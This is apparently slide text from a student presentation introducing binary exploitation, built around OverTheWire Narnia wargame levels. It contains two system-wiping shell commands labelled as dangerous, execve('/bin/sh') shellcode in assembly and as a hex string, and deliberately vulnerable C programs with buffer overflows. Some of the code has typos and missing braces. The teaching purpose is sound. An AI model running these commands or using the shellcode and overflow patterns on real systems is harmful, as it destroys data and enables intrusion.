Introduction to Binary Exploitation (and its relevance to Servo) - RCOS Presentation

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Trusted vs. Untrusted input

Trusted input

Don't actually run these, they're dangerous
rm -rf --no-preserve-root /
dd if=/dev/urandom of=/dev/sda bs=4096

▶ Untrusted input¹











¹https://xkcd.com/327/

Basic memory corruption

ssh narniaO@narnia.labs.overthewire.org

```
#include <stdio.h>
#include <stdlib.h>
int main(){
        long val=0x41414141;
        char buf[20];
        printf("Correct val's value from 0x41414141 -> 0xdeadbeef!\n");
        printf("Here is your chance: ");
        scanf("%24s", &buf);
        printf("buf: %s\n",buf);
        printf("val: 0x%08x\n",val);
        if(val==0xdeadbeef)
                system("/bin/sh");
        else {
                printf("WAY OFF!!!!\n");
                exit(1):
        return 0;
```

Shellcode

```
# grep execve /usr/include/x86_64-linux-gnu/asm/unistd_32.h
# #define __NR_execve 11
# man 2 execve
# int execve(const char *filename, char *const argv[], char *const envp[]);
# https://en.wikibooks.org/wiki/X86_Assembly/Interfacing_with_Linux
# eax = syscall[eax](ebx, ecx, edx, esi, edi, ebp)
xor %eax. %eax
xor %ecx, %ecx
xor %edx. %edx
mov $11, %al
jmp strLiteral
afterStrLiteral:
pop %ebx
int $0x80
strLiteral:
call afterStrLiteral
.string "/bin/sh"
```

```
const char main[] =
    "\x31\xc0\x31\xc9\x31\xd2\xb0\x0b\xeb\x03\x5b\xcd\x80"
    "\xe8\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00";
```

Use of shellcode

ssh narnia1@narnia.labs.overthewire.org

```
#include <stdio.h>
int main(){
        int (*ret)();
        if(getenv("EGG")==NULL){
                printf("Give me something to execute"
                       " at the env-variable EGG\n");
                exit(1);
        printf("Trying to execute EGG!\n");
        ret = getenv("EGG");
        ret();
        return 0;
```

Injecting shellcode

ssh narnia2@narnia.labs.overthewire.org

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
int main(int argc, char * argv[]){
        char buf [128];
        if(argc == 1){
                printf("Usage: %s argument\n", argv[0]);
                exit(1);
        strcpy(buf,argv[1]);
        printf("%s", buf);
        return 0;
```

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